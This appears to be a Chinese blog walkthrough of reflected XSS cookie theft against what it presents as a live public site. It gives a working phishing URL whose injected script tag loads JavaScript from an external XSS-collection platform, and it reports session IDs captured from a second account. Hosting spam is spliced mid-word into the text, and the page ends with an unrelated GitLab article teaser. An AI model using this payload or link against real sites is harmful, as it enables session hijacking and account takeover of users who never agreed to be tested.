危害:获取Cookie
开始学习反射型服务器托管网XSS时不知道有什么危害,弹个1没啥用,于是我们利用经典的展开攻击
经过这波操作,我们获得了 敏感信息PHPSESSID=94a7gvd2icb3hva0u255jjadl0
反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie
打Cookie实战
目标:云图AI开放平台
来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie
发现一个搜索框,测试可以弹,证明这个网站存在XSS
此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台
XSS平台-XSS安全测试平台
在这个平台创建一个项目,选择无keepsession
查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接
恶意JS:
钓鱼链接:
https://moomoopark.com/index.php?pro_keyword=%3CsCRiPt%20sRC=//xss.yt/WnT3%3E%3C/sCrIpT%3E&c=search&m=index
zyh66服务器托管网6访问钓鱼链接,测试可以收到cookie
其中PHPSESSID=k5ckg7164sldfd8dm4phom2qq5
接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!
其中PHPSESSID=3c4161sbsijrqoq8pjmhquus37
实战打Cookie成功
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
相关推荐: 百亿美金的设计,深度剖析 GitLab 的 Postgres 数据库 schema
原文链接 这篇文章写于 2022 年,前一年 GitLab 刚好完成 IPO。目前 GitLab 市值超过 100 亿美金,它的所有收入都来源于同名产品 GitLab,而这篇文章就是全面分析 GitLab 这个产品的数据库 schema。 我花了一些时间研究 …